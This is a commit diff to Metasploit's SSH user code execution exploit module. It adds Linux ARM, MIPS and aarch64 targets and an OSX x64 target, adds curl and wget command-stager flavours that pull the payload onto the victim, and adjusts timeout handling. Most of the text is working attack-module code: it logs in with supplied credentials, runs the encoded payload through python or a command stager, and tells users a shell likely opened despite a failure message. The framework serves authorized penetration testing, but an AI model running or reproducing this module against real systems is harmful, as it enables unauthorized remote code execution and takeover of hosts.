Land rapid7#9267, Add targets to sshexec

Author: busterb

modules/exploits/multi/ssh/sshexec.rb

@@ -16,11 +16,11 @@ class MetasploitModule < Msf::Exploit::Remote
   def initialize
     super(
       'Name'             => 'SSH User Code Execution',
-      'Description'      => %q{
+      'Description'      => %q(
         This module connects to the target system and executes the necessary
         commands to run the specified payload via SSH. If a native payload is
         specified, an appropriate stager will be used.
-      },
+      ),
       'Author'           => ['Spencer McIntyre', 'Brandon Knight'],
       'References'       =>
         [
@@ -35,39 +35,82 @@ def initialize
         },
       'Payload'          =>
         {
-          'Space'        => 4096,
+          'Space'        => 800000,
           'BadChars'     => "",
           'DisableNops'  => true
         },
-      'Platform'         => %w{ linux osx python },
+      'Platform'         => %w[linux osx python],
+      'CmdStagerFlavor'  => %w[bourne echo printf wget],
       'Targets'          =>
         [
-          [ 'Linux x86',
+          [
+            'Linux x86',
             {
               'Arch'     => ARCH_X86,
               'Platform' => 'linux'
             }
           ],
-          [ 'Linux x64',
+          [
+            'Linux x64',
             {
               'Arch'     => ARCH_X64,
               'Platform' => 'linux'
             }
           ],
-          [ 'OSX x86',
+          [
+            'Linux armle',
             {
-              'Arch'     => ARCH_X86,
-              'Platform' => 'osx'
+              'Arch'     => ARCH_ARMLE,
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'Linux mipsle',
+            {
+              'Arch'             => ARCH_MIPSLE,
+              'Platform'         => 'linux',
+              'CmdStagerFlavor'  => %w[curl wget]
             }
           ],
-          [ 'Python',
+          [
+            'Linux mipsbe',
+            {
+              'Arch'             => ARCH_MIPSBE,
+              'Platform'         => 'linux',
+              'CmdStagerFlavor'  => %w[wget]
+            }
+          ],
+          [
+            'Linux aarch64',
+            {
+              'Arch'     => ARCH_AARCH64,
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'OSX x86',
+            {
+              'Arch'             => ARCH_X86,
+              'Platform'         => 'osx',
+              'CmdStagerFlavor'  => %w[curl wget]
+            }
+          ],
+          [
+            'OSX x64',
+            {
+              'Arch'             => ARCH_X64,
+              'Platform'         => 'osx',
+              'CmdStagerFlavor'  => %w[curl wget]
+            }
+          ],
+          [
+            'Python',
             {
               'Arch'     => ARCH_PYTHON,
               'Platform' => 'python'
             }
           ]
         ],
-      'CmdStagerFlavor'  => %w{ bourne echo printf },
       'DefaultTarget'    => 0,
       # For the CVE
       'DisclosureDate'   => 'Jan 01 1999'
@@ -77,7 +120,7 @@ def initialize
       [
         OptString.new('USERNAME', [ true, "The user to authenticate as.", 'root' ]),
         OptString.new('PASSWORD', [ true, "The password to authenticate with.", '' ]),
-        OptString.new('RHOST', [ true, "The target address" ]),
+        Opt::RHOST(),
         Opt::RPORT(22)
       ], self.class
     )
@@ -92,26 +135,28 @@ def initialize
   def execute_command(cmd, opts = {})
     vprint_status("Executing #{cmd}")
     begin
-      Timeout.timeout(3) do
+      Timeout.timeout(5) do
         self.ssh_socket.exec!("#{cmd}\n")
       end
-    rescue ::Exception
+    rescue Timeout::Error
+      print_error("SSH Timeout Exception will say the Exploit Failed; do not believe it.")
+      print_good("You will likely still get a shell; run sessions -l to be sure.")
     end
   end
 
   def do_login(ip, user, pass, port)
     factory = ssh_socket_factory
     opt_hash = {
-      :auth_methods  => ['password', 'keyboard-interactive'],
-      :port          => port,
-      :use_agent     => false,
-      :config        => false,
-      :password      => pass,
-      :proxy         => factory,
-      :non_interactive => true
+      auth_methods:    ['password', 'keyboard-interactive'],
+      port:            port,
+      use_agent:       false,
+      config:          false,
+      password:        pass,
+      proxy:           factory,
+      non_interactive: true
     }
 
-    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    opt_hash[:verbose] = :debug if (datastore['SSH_DEBUG'])
 
     begin
       self.ssh_socket = Net::SSH.start(ip, user, opt_hash)
@@ -133,12 +178,11 @@ def do_login(ip, user, pass, port)
 
   def exploit
     do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
-
     print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")
     if target['Platform'] == 'python'
       execute_command("python -c \"#{payload.encoded}\"")
     else
-      execute_cmdstager({:linemax => 500})
+      execute_cmdstager(linemax: 500)
     end
 
     self.ssh_socket.close